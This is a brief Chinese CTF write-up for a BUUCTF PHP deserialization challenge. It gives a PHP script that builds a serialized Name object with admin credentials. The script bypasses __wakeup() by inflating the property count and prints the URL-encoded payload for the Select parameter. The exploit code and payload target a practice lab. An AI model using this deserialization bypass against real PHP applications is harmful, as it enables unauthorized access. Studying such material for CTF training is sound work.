打开
发现有一个提示,良好网站备份,一般情况下是拿dirsearch扫的。但是我的dirsearch扫buu都是429,头大呢。
看别的师傅的wp,扫除一个www.zip,源码如下。
以及
分析一下:
第一张图片说我们应该get上去一个select。
第二张图片和我说让我改username=admin,password=100。然后绕过__wakeup()
Exp:
<?php class Name{ private $username = '11111'; private $password = '22222'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } } $j17 = new Name('admin','100'); $a=serialize($j17); $a=str_replace(':2:',':3:',$a);//绕过wakeup echo urlencode($a); ?>
payload:
/?Select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
